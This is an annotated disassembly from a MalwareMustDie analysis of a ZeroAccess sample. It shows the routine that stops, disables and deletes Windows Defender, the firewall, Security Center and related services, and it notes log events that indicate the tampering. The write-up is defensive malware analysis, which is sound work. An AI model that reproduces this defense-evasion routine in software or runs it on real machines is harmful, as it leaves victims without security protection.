- // #MalwareMustDie! Case contants.exe ZeroAccess RECYCLER
- // Case: http://malwaremustdie.blogspot.jp/2013/02/blackhole-of-closest-version-with.html
- // In the .text PE section found the routine that stops, disables and
- // deletes (not merely "closes") the following Windows services via the SCM:
- // MsMpSvc (Microsoft Antimalware), windefend (Windows Defender),
- // SharedAccess (Internet Connection Sharing), iphlpsvc (IP Helper),
- // wscsvc (Security Center), mpssvc (Windows Firewall), bfe (Base Filtering Engine).
- // Defense-evasion indicator: each target typically leaves System log events
- // 7036 (service entered the stopped state) and 7040 (start type changed to disabled).
- // @unixfreaxjp /malware]$ date | Wed Feb 6 15:53:41 JST 2013
- // usage of DisableThreadLibraryCalls :
- // Lets a DLL opt out of DLL_THREAD_ATTACH / DLL_THREAD_DETACH notifications.
- // It is passed the module's own handle (hLibModule), so this fragment is most
- // likely the DLL entry point (DllMain); the call's return value is not checked.
- 0x4017FB push [ebp+hLibModule] ; hLibModule
- 0x4017FE call ds:DisableThreadLibraryCalls
- 0x401804 call sub_4016D1
- 0x401809 test eax, eax
- 0x40180B jz short loc_401832
- // Open a registry key (object attributes are prepared before this excerpt) and,
- // when ZwOpenKey returns a success NTSTATUS (eax >= 0, the jl is the failure
- // path), delete a value from it and close the handle. The key path is not
- // visible here; the handle lives in the local hSCObject, reused below for the SCM.
- 0x402659 call ds:ZwOpenKey
- 0x40265F test eax, eax
- 0x402661 jl short loc_40267A
- 0x402663 push offset asc_41D0DC ; " \""
- 0x402668 push [ebp+hSCObject]
- 0x40266B call ds:ZwDeleteValueKey
- 0x402671 push [ebp+hSCObject]
- 0x402674 call ds:ZwClose
- // Connect to the local SCM (lpMachineName / lpDatabaseName = NULL) with
- // SC_MANAGER_ALL_ACCESS (0F003Fh). This requires administrator rights; a NULL
- // handle jumps to loc_40274B and all of the service tampering below is skipped.
- 0x40267A loc_40267A: ; CODE XREF: sub_402634+2Dj
- 0x40267A push 0F003Fh ; dwDesiredAccess
- 0x40267F push 0 ; lpDatabaseName
- 0x402681 push 0 ; lpMachineName
- 0x402683 call ds:OpenSCManagerW ; Establish a connection to the service
- ; control manager on the specified computer
- ; and opens the specified database
- 0x402689 mov [ebp+hSCObject], eax
- 0x40268C test eax, eax
- 0x40268E jz loc_40274B
- 0x402694 push ebx
- 0x402695 push esi
- 0x402696 push edi
- // Open each target service with SERVICE_ALL_ACCESS (0F01FFh, kept in ebx) and
- // hand the handle to sub_4024E2 in esi. A NULL handle (service not installed)
- // just falls through to the next target. First target: "MsMpSvc"
- 0x402697 mov edi, ds:OpenServiceW
- 0x40269D mov ebx, 0F01FFh
- 0x4026A2 push ebx ; dwDesiredAccess
- 0x4026A3 push offset ServiceName ; "MsMpSvc"
- 0x4026A8 push eax ; hSCManager
- 0x4026A9 call edi ; OpenServiceW
- 0x4026AB test eax, eax
- 0x4026AD jz short loc_4026B6
- 0x4026AF mov esi, eax
- 0x4026B1 call sub_4024E2
- // opening service "windefend" (Windows Defender)
- 0x4026B6 loc_4026B6: ; CODE XREF: sub_402634+79j
- 0x4026B6 push ebx ; dwDesiredAccess
- 0x4026B7 push offset aWindefend ; "windefend"
- 0x4026BC push [ebp+hSCObject] ; hSCManager
- 0x4026BF call edi ; OpenServiceW
- 0x4026C1 test eax, eax
- 0x4026C3 jz short loc_4026CC
- 0x4026C5 mov esi, eax
- 0x4026C7 call sub_4024E2
- // opening service "SharedAccess"
- 0x4026CC loc_4026CC: ; CODE XREF: sub_402634+8Fj
- 0x4026CC push ebx ; dwDesiredAccess
- 0x4026CD push offset aSharedaccess ; "SharedAccess"
- 0x4026D2 push [ebp+hSCObject] ; hSCManager
- 0x4026D5 call edi ; OpenServiceW
- 0x4026D7 test eax, eax
- 0x4026D9 jz short loc_4026E2
- 0x4026DB mov esi, eax
- 0x4026DD call sub_4024E2
- 0x4026E2
- // opening service "iphlpsvc"
- 0x4026E2 loc_4026E2: ; CODE XREF: sub_402634+A5j
- 0x4026E2 push ebx ; dwDesiredAccess
- 0x4026E3 push offset aIphlpsvc ; "iphlpsvc"
- 0x4026E8 push [ebp+hSCObject] ; hSCManager
- 0x4026EB call edi ; OpenServiceW
- 0x4026ED test eax, eax
- 0x4026EF jz short loc_4026F8
- 0x4026F1 mov esi, eax
- 0x4026F3 call sub_4024E2
- 0x4026F8
- // opening service "wscsvc"
- 0x4026F8 loc_4026F8: ; CODE XREF: sub_402634+BBj
- 0x4026F8 push ebx ; dwDesiredAccess
- 0x4026F9 push offset aWscsvc ; "wscsvc"
- 0x4026FE push [ebp+hSCObject] ; hSCManager
- 0x402701 call edi ; OpenServiceW
- 0x402703 test eax, eax
- 0x402705 jz short loc_40270E
- 0x402707 mov esi, eax
- 0x402709 call sub_4024E2
- 0x40270E
- // opening service "mpssvc"
- 0x40270E loc_40270E: ; CODE XREF: sub_402634+D1j
- 0x40270E push ebx ; dwDesiredAccess
- 0x40270F push offset aMpssvc ; "mpssvc"
- 0x402714 push [ebp+hSCObject] ; hSCManager
- 0x402717 call edi ; OpenServiceW
- 0x402719 test eax, eax
- 0x40271B jz short loc_402724
- 0x40271D mov esi, eax
- 0x40271F call sub_4024E2
- 0x402724
- // opening service "bfe"
- 0x402724 loc_402724: ; CODE XREF: sub_402634+E7j
- 0x402724 push ebx ; dwDesiredAccess
- 0x402725 push offset aBfe ; "bfe"
- 0x40272A push [ebp+hSCObject] ; hSCManager
- 0x40272D call edi ; OpenServiceW
- 0x40272F test eax, eax
- 0x402731 jz short loc_40273A
- 0x402733 mov esi, eax
- 0x402735 call sub_4024E2
- 0x40273A
- // Close the SCM handle, then continue in sub_402593 (not shown). The
- // function's prologue and its return lie outside this excerpt.
- 0x40273A loc_40273A: ; CODE XREF: sub_402634+FDj
- 0x40273A push [ebp+hSCObject] ; hSCObject
- 0x40273D call ds:CloseServiceHandle
- 0x402743 call sub_402593
- 0x402748 pop edi
- 0x402749 pop esi
- 0x40274A pop ebx
- // sub_4024E2: stop, disable and delete the service whose handle is in esi
- 0x4024E2 sub_4024E2 proc near ; stop + disable + delete one service
- // Contract (non-standard, register-based):
- //   In:   esi = open service handle (callers open it with SERVICE_ALL_ACCESS)
- //   Out:  the handle in esi is closed; eax = CloseServiceHandle result
- //   Saves/restores edi; eax (and, per stdcall, possibly ecx/edx) and flags are clobbered.
- // Return values of ControlService (after the retry loop), ChangeServiceConfigW
- // and DeleteService are never checked; failures are silently ignored.
- 0x4024E2
- 0x4024E2 ServiceStatus = _SERVICE_STATUS ptr -1Ch ; 28-byte SERVICE_STATUS, filled by ControlService but never read
- 0x4024E2
- 0x4024E2 sub esp, 1Ch ; room for ServiceStatus
- 0x4024E5 push edi ; callee-saved
- 0x4024E6 push 4
- 0x4024E8 pop edi ; edi = remaining stop attempts (4)
- 0x4024E9
- // Stop loop: send SERVICE_CONTROL_STOP; if the only error is "dependent
- // services still running", sleep 1 s and try again, at most 4 times. Success,
- // any other error, or exhausting the retries all fall through to the disable
- // step, so the service may still be running when it is disabled and deleted.
- 0x4024E9 loc_4024E9: ;
- 0x4024E9 lea eax, [esp+20h+ServiceStatus] ; = esp+4 after the push edi
- 0x4024ED push eax ; lpServiceStatus
- 0x4024EE push 1 ; dwControl = SERVICE_CONTROL_STOP
- 0x4024F0 push esi ; hService
- 0x4024F1 call ds:ControlService ; ask the SCM to stop the service
- 0x4024F7 test eax, eax
- 0x4024F9 jnz short loc_402516 ; stop request accepted -> go disable it
- 0x4024FB call ds:GetLastError
- 0x402501 cmp eax, 41Bh ; ERROR_DEPENDENT_SERVICES_RUNNING (1051)
- 0x402506 jnz short loc_402516 ; any other error: give up on stopping
- 0x402508 push 3E8h ; dwMilliseconds = 1000
- 0x40250D call ds:Sleep
- 0x402513 dec edi
- 0x402514 jnz short loc_4024E9 ; retry while attempts remain
- 0x402516
- 0x402516 loc_402516:
- // Disable: ChangeServiceConfigW(hService, SERVICE_WIN32_SHARE_PROCESS,
- // SERVICE_DISABLED, SERVICE_ERROR_IGNORE, NULL x7). Note dwServiceType is
- // forced to 20h instead of SERVICE_NO_CHANGE (0FFFFFFFFh).
- 0x402516 xor eax, eax ; eax = 0 / NULL for every optional argument
- 0x402518 push eax ; lpDisplayName = NULL
- 0x402519 push eax ; lpPassword = NULL
- 0x40251A push eax ; lpServiceStartName = NULL
- 0x40251B push eax ; lpDependencies = NULL
- 0x40251C push eax ; lpdwTagId = NULL
- 0x40251D push eax ; lpLoadOrderGroup = NULL
- 0x40251E push eax ; lpBinaryPathName = NULL
- 0x40251F push eax ; dwErrorControl = SERVICE_ERROR_IGNORE (0)
- 0x402520 push 4 ; dwStartType = SERVICE_DISABLED
- 0x402522 push 20h ; dwServiceType = SERVICE_WIN32_SHARE_PROCESS
- 0x402524 push esi ; hService
- // Disable the service so it does not return on reboot, then mark it for
- // deletion; the SCM removes it once it is stopped and every handle is closed.
- 0x402525 call ds:ChangeServiceConfigW ; set start type to disabled (result ignored)
- 0x40252B push esi ; hService
- 0x40252C call ds:DeleteService ; mark for deletion (result ignored)
- 0x402532 push esi ; hSCObject = the same service handle, not the SCM handle
- 0x402533 call ds:CloseServiceHandle ; closing the last handle lets the deletion complete
- 0x402539 pop edi
- 0x40253A add esp, 1Ch
- 0x40253D retn
- 0x40253D sub_4024E2 endp
- ---
- #MalwareMustDie